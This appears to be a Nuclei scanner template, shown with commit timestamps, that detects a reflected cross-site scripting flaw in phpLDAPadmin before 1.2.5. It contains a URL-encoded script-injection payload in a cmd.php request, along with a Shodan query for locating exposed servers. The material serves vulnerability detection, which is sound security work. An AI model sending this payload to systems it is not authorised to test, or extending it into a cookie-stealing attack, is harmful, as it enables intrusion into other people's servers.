nuclei-templates/http/vulnerabilities/other/phpldapadmin-xss.yaml

49 lines
1.3 KiB
YAML
Raw Normal View History

2023-09-12 09:24:31 +00:00
id: phpldapadmin-xss
info:
name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
author: GodfatherOrwa,herry
severity: medium
reference:
- https://twitter.com/GodfatherOrwa/status/1701392754251563477
metadata:
2023-10-14 11:27:55 +00:00
verified: true
max-request: 9
2023-09-12 09:24:31 +00:00
shodan-query: html:"phpLDAPadmin"
tags: php,phpldapadmin,xss
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
- "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"
attack: pitchfork
payloads:
path:
2023-09-12 09:28:16 +00:00
- /
2023-09-12 09:24:31 +00:00
- /htdocs/index.php
- /phpldapadmin
stop-at-first-match: true
cookie-reuse: true
2023-10-14 11:27:55 +00:00
2023-09-12 09:24:31 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "No such entry"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a004630440220329a56d4d406c4bb9fa1dff944dbf2c69270061862c6688fdf0aa166a84120110220774f3cf42e8821facfbfc89d534d4c478896aa3677cd4824e6b03579586bfac8:922c64590222798bb761d5b6d8e72950